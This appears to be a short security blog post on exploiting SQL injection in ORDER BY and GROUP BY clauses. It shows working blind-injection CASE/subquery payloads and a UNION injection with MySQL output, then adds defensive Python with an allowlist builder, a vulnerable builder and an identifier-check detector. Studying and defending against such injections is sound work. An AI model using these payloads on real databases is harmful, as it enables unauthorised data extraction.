Injection in Order by, Group by Clause

August 1, 2008

Exploiting SQL injections when the input goes into the ORDER BY clause is a bit tricky, as UNION queries are not permitted after an ORDER BY clause. The following could be used in such a scenario to form blind SQL injection cases, since the subquery is evaluated only when the CASE condition is false and then raises an error:

mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;
+------+
| id   |
+------+
|    1 |
+------+
1 row in set (0.00 sec)

----

mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row

----

For injections where the user's input goes into the GROUP BY clause, UNION queries can be used, although the above technique will also work for blind injection examples:

mysql> select id from news where id =1 group by id union select 2222;
+------+
| id   |
+------+
|    1 |
| 2222 |
+------+
2 rows in set (0.00 sec)
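Both the ORDER BY and GROUP BY cases above arise because a sort or grouping column is an identifier, not a value, so it cannot be passed as a bound query parameter. The defensive fix is to map the untrusted input onto an allowlist of column names instead of concatenating it. The following is an added example, not code from the original post; the table and column names are assumed, and the injected input is the post's own CASE/subquery payload used as a constructed test value.

```python
import re

# Assumed allowlist of sortable columns for a hypothetical "news" table.
ALLOWED_SORT_COLUMNS = {"id", "title", "published_at"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


class UnsafeSortParameter(ValueError):
    """Raised when a sort column or direction is not on the allowlist."""


def build_order_by_unsafe(sort_expr: str) -> str:
    """The vulnerable pattern: the user's input is pasted into ORDER BY verbatim.
    Identifiers cannot be bound as parameters, so any expression the user
    supplies becomes part of the query, which is what the post's payload relies on."""
    return f"SELECT id FROM news WHERE id = %s ORDER BY {sort_expr}"


def build_order_by_safe(column: str, direction: str = "ASC") -> str:
    """Hardened form: only allowlisted identifiers reach the SQL string.
    Unknown values are rejected outright rather than escaped or sanitised."""
    if column not in ALLOWED_SORT_COLUMNS:
        raise UnsafeSortParameter(f"sort column not allowed: {column!r}")
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise UnsafeSortParameter(f"sort direction not allowed: {direction!r}")
    # The row filter stays a bound parameter (%s); the identifier is quoted.
    return f"SELECT id FROM news WHERE id = %s ORDER BY `{column}` {direction}"


def is_plain_identifier(value: str) -> bool:
    """Cheap detection check for request logs or WAF rules: a sort parameter
    should be a bare identifier. Parentheses, commas, quotes or keywords in it
    indicate tampering and are worth alerting on."""
    return re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*", value) is not None


# Constructed inputs: a legitimate sort column and the post's blind-injection payload.
LEGIT_INPUT = "id"
INJECTED_INPUT = ("1, (select case when (1=2) then 1 else "
                  "1*(select table_name from information_schema.tables) end)=1")
```

With the unsafe builder the payload lands in the query unchanged; the allowlisted builder raises on it, and the identifier check flags it before the query is ever built.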
